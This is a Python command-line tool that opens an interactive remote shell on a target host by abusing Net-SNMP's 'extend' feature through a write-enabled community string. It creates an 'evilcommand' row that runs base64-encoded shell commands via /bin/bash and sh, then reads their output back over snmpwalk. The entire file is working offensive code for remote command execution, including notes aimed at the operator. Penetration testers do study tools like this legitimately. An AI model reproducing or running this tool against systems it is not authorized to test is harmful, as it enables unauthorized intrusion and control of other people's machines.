import base64
import os
import re
import shlex
import subprocess

import click
from termcolor import colored
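# Click config: accept both -h and --help for the command's help page.
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])

# Markers used to cut the command output out of an `snmpwalk nsExtendOutputFull`
# dump: "start" is the prefix snmpwalk prints in front of the "evilcommand"
# row's output, "end" is the first row of the next column after it.
delimiters = {"start": """NET-SNMP-EXTEND-MIB::nsExtendOutputFull."evilcommand" = STRING: """,
              "end": """NET-SNMP-EXTEND-MIB::nsExtendOutNumLines"""}

# Regex isolating what the remote shell wrote between the ]LEDEBUT] / ]LAFIN]
# sentinels; `[\s\S]*` is used instead of `.*` so it spans newlines.
# Raw string: the original non-raw literal relied on `\]`, `\s` and `\S` being
# unrecognised escapes (a SyntaxWarning on recent Pythons); the value is identical.
reg = r"""\]LEDEBUT\]([\s\S]*)\]LAFIN\]"""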
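def _snmp_stdout(argv: list[str]) -> str:
    """Run one Net-SNMP command-line tool and return its stdout as text.

    `argv` is handed to the process directly (no shell), so an IP, community
    string, version or binary path containing shell metacharacters cannot
    rewrite the command line.  stderr is inherited so Net-SNMP diagnostics
    (timeouts, wrong community) still reach the operator.  Output is captured
    in memory rather than through a fixed file under /tmp, which would leak
    command output to other local users and be open to symlink tricks.
    Undecodable bytes in the output are replaced instead of raising.
    """
    try:
        completed = subprocess.run(
            argv,
            stdout=subprocess.PIPE,
            encoding="utf-8",
            errors="replace",
            check=False,
        )
    except OSError as exc:
        # Typically a wrong --snmpset/--snmpwalk path; report it instead of a traceback.
        print("Cannot run {}: {}".format(argv[0], exc))
        return ""
    return completed.stdout


def _extract_output(walk_dump: str) -> str:
    """Pull the remote command's output out of an `snmpwalk nsExtendOutputFull` dump.

    Collects the line carrying the "evilcommand" row (minus the OID/STRING
    prefix) and every following line up to, but excluding, the first line
    that mentions nsExtendOutNumLines.  Returns "" when the start marker
    never appears; callers treat that as "extend not available".
    """
    collected = []
    capturing = False
    for line in walk_dump.splitlines(keepends=True):
        if delimiters["start"] in line:
            capturing = True
            collected.append(line.replace(delimiters["start"], ""))
        elif capturing:
            if delimiters["end"] in line:
                break
            collected.append(line)
    return "".join(collected)


def _prompt(user: str, host: str, cwd: str) -> str:
    """Build the coloured `user@host:cwd$ ` prompt shown by the fake shell."""
    return colored(user + "@" + host, "red") + ":" + colored(cwd, "cyan") + "$ "


# Operator notes (kept out of --help on purpose):
# * A write-enabled community string is full code execution as snmpd's user
#   on the target; with SNMP v1/v2c that string, every command and every
#   response cross the network unencrypted.
# * Only `-v` and `-c` are passed to the Net-SNMP tools, so SNMPv3 user and
#   auth/priv settings are not wired in; `-v 3` is unlikely to work as-is
#   (TODO confirm against a v3 target).
# * Commands run through an nsExtend row named "evilcommand" that anyone able
#   to read NET-SNMP-EXTEND-MIB on the target can see while the session is
#   open; the row is destroyed again on Ctrl-C / EOF.
@click.command(context_settings=CONTEXT_SETTINGS)
@click.argument('ip')
@click.option(
    '--communitystring', '-c',
    help='Community string for SNMP',
    default="private"
)
@click.option(
    '--version', '-v',
    help='SNMP version (1/2c/3)',
    default="2c"
)
@click.option(
    '--snmpset', '-ss',
    help='Path for the snmpset binary',
    default="/usr/bin/snmpset"
)
@click.option(
    '--snmpwalk', '-sw',
    help='Path for the snmpwalk binary',
    default="/usr/bin/snmpwalk"
)
def run(ip: str, communitystring: str, version: str, snmpset: str, snmpwalk: str) -> None:
    """Simulates a terminal over Net-SNMP \"extend\" functionality.
    Be sure your SNMP Community String has write access."""
    # Every snmpset call targets the same extend row; the MIB is loaded
    # explicitly so the symbolic column names resolve.
    set_base = [snmpset, "-m", "+NET-SNMP-EXTEND-MIB", "-v", version, "-c", communitystring, ip]
    walk_base = [snmpwalk, "-v", version, "-c", communitystring, ip]

    def destroy() -> None:
        """Remove the "evilcommand" row so the next createAndGo starts clean."""
        _snmp_stdout(set_base + ['nsExtendStatus."evilcommand"', "=", "destroy"])

    def process(cmd: str) -> str:
        """Run `cmd` on the target through the extend row and return its raw output.

        The command is base64-encoded so the payload stays inside
        [A-Za-z0-9+/=]: whatever the operator types cannot break the quoting of
        the nsExtendArgs value on the local or the remote side.
        """
        payload = base64.b64encode(cmd.encode()).decode()
        destroy()
        _snmp_stdout(set_base + [
            'nsExtendStatus."evilcommand"', "=", "createAndGo",
            'nsExtendCommand."evilcommand"', "=", "/bin/bash",
            'nsExtendArgs."evilcommand"', "=", '-c "echo {} | base64 -d | sh"'.format(payload),
        ])
        dump = _snmp_stdout(walk_base + ["NET-SNMP-EXTEND-MIB::nsExtendOutputFull"])
        return _extract_output(dump)

    marker_re = re.compile(reg)

    # Probe once to learn user/host/cwd; this also proves the extend row works.
    # "[" is the field separator, so it is assumed absent from user and host;
    # maxsplit keeps any "[" inside the cwd intact.
    try:
        probe = process("echo -n ]LEDEBUT]$(whoami)[$(hostname)[$(pwd)]LAFIN]")
        user, host, path = marker_re.findall(probe)[0].split("[", 2)
        prompt = _prompt(user, host, path)
        print("")
    except (IndexError, ValueError):
        print("Error.\nBe sure your SNMP Community String has write access & your NET-SNMP target has \"extend\" functionality.")
        raise SystemExit(1)

    try:
        while True:
            text = input(prompt).strip()
            if not text:
                continue
            # Each command starts in the cwd reported by the previous one (the
            # extend row has no persistent shell); the cwd is shell-quoted so
            # directories with spaces or metacharacters still work.  The
            # trailer line reports the new user/host/cwd for the next prompt.
            wrapped = ("echo -n ']LEDEBUT]' ; cd {} && ".format(shlex.quote(path)) + text
                       + " 2>&1 ; echo $(whoami)[$(hostname)[$(pwd) ; echo ']LAFIN]'")
            raw = process(wrapped)
            try:
                lines = marker_re.findall(raw)[0].split("\n")
                # The penultimate element is the "user[host[cwd" trailer; the
                # last one is the empty string after the final newline.
                user, host, path = lines.pop(len(lines) - 2).split("[", 2)
                prompt = _prompt(user, host, path)
                print("\n".join(lines))
            except (IndexError, ValueError):
                print("Error.\n")
    except (KeyboardInterrupt, EOFError):
        # Leave no extend row behind on the target (may take a timeout if the
        # target is already unreachable).
        destroy()
        print(colored("\nGoodbye !", "cyan"))
        raise SystemExit(0)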
# Script entry point: hand control to the click command.
if __name__ == "__main__":
    run()